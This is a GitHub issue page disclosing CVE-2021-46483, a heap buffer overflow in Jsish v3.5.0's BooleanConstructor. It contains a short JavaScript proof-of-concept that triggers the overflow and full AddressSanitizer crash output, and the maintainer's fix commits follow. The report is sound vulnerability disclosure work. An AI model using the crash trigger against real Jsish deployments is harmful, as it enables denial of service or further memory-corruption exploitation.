Headline
CVE-2021-46483: Heap-buffer-overflow src/jsiBool.c:17 in BooleanConstructor · Issue #62 · pcmacdon/jsish
Jsish v3.5.0 was discovered to contain a heap buffer overflow via BooleanConstructor at src/jsiBool.c.
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Closed
hope-fly opened this issue
Dec 24, 2021
· 0 comments
Comments
Jsish revision
Commit: 9fa798e
Version: v3.5.0
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
export CFLAGS=’-fsanitize=address’ make
Test case
function JSEtest(val) { Boolean.bind(a)(); if (val < 3) return true; else return false; }
var arr = new Array(10); arr[1] = 1; Array.prototype.unshift(arr.every(JSEtest), true, ‘test’);
Execution steps & Output
$ ./jsish/jsish poc.js
=====ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6040000188c0 at pc 0x55dff29d9510 bp 0x7ffc8e20b280 sp 0x7ffc8e20b270 WRITE of size 4 at 0x6040000188c0 thread T0 #0 0x55dff29d950f in BooleanConstructor src/jsiBool.c:17 #1 0x55dff29af818 in jsi_FuncCallSub src/jsiProto.c:244 #2 0x55dff292cfec in jsi_FunctionInvoke src/jsiFunc.c:777 #3 0x55dff292cfec in Jsi_FunctionInvoke src/jsiFunc.c:789 #4 0x55dff29a8ad6 in jsi_FuncBindCall src/jsiProto.c:299 #5 0x55dff29af818 in jsi_FuncCallSub src/jsiProto.c:244 #6 0x55dff2c7971a in jsiFunctionSubCall src/jsiEval.c:796 #7 0x55dff2c7971a in jsiEvalFunction src/jsiEval.c:837 #8 0x55dff2c7971a in jsiEvalCodeSub src/jsiEval.c:1264 #9 0x55dff2c8d15e in jsi_evalcode src/jsiEval.c:2204 #10 0x55dff29b0834 in jsi_FuncCallSub src/jsiProto.c:220 #11 0x55dff292cfec in jsi_FunctionInvoke src/jsiFunc.c:777 #12 0x55dff292cfec in Jsi_FunctionInvoke src/jsiFunc.c:789 #13 0x55dff29f3f64 in jsi_ArrayFindSubCmd src/jsiArray.c:576 #14 0x55dff29f3f64 in jsi_ArrayEveryCmd src/jsiArray.c:663 #15 0x55dff29af818 in jsi_FuncCallSub src/jsiProto.c:244 #16 0x55dff2c7971a in jsiFunctionSubCall src/jsiEval.c:796 #17 0x55dff2c7971a in jsiEvalFunction src/jsiEval.c:837 #18 0x55dff2c7971a in jsiEvalCodeSub src/jsiEval.c:1264 #19 0x55dff2c8d15e in jsi_evalcode src/jsiEval.c:2204 #20 0x55dff2c91274 in jsi_evalStrFile src/jsiEval.c:2665 #21 0x55dff298066a in Jsi_Main src/jsiInterp.c:936 #22 0x55dff318503a in jsi_main src/main.c:47 #23 0x7fb189dc7bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #24 0x55dff2914969 in _start (/usr/local/bin/jsish+0xe8969)
0x6040000188c0 is located 6 bytes to the right of 42-byte region [0x604000018890,0x6040000188ba) allocated by thread T0 here: #0 0x7fb18aa36d28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28) #1 0x55dff2985aa4 in Jsi_Calloc src/jsiUtils.c:57
SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiBool.c:17 in BooleanConstructor Shadow bytes around the buggy address: 0x0c087fffb0c0: fa fa 00 00 00 00 00 06 fa fa 00 00 00 00 00 00 0x0c087fffb0d0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00 0x0c087fffb0e0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa 0x0c087fffb0f0: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa 0x0c087fffb100: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa =>0x0c087fffb110: fa fa 00 00 00 00 00 02[fa]fa 00 00 00 00 00 00 0x0c087fffb120: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb130: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb140: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb150: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb160: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb
Credits: Found by OWL337 team.
pcmacdon pushed a commit that referenced this issue
Dec 27, 2021
FossilOrigin-Name: abc08a84b5b31a4fb135ef435ab424af494f762ab186099ed941799932a26b1b
pcmacdon pushed a commit that referenced this issue
Dec 27, 2021
FossilOrigin-Name: 9ffd681c6da9c7f8997cdb0f86c72a16dcad0c8333cbb764dd6080e4cfc1129f
1 participant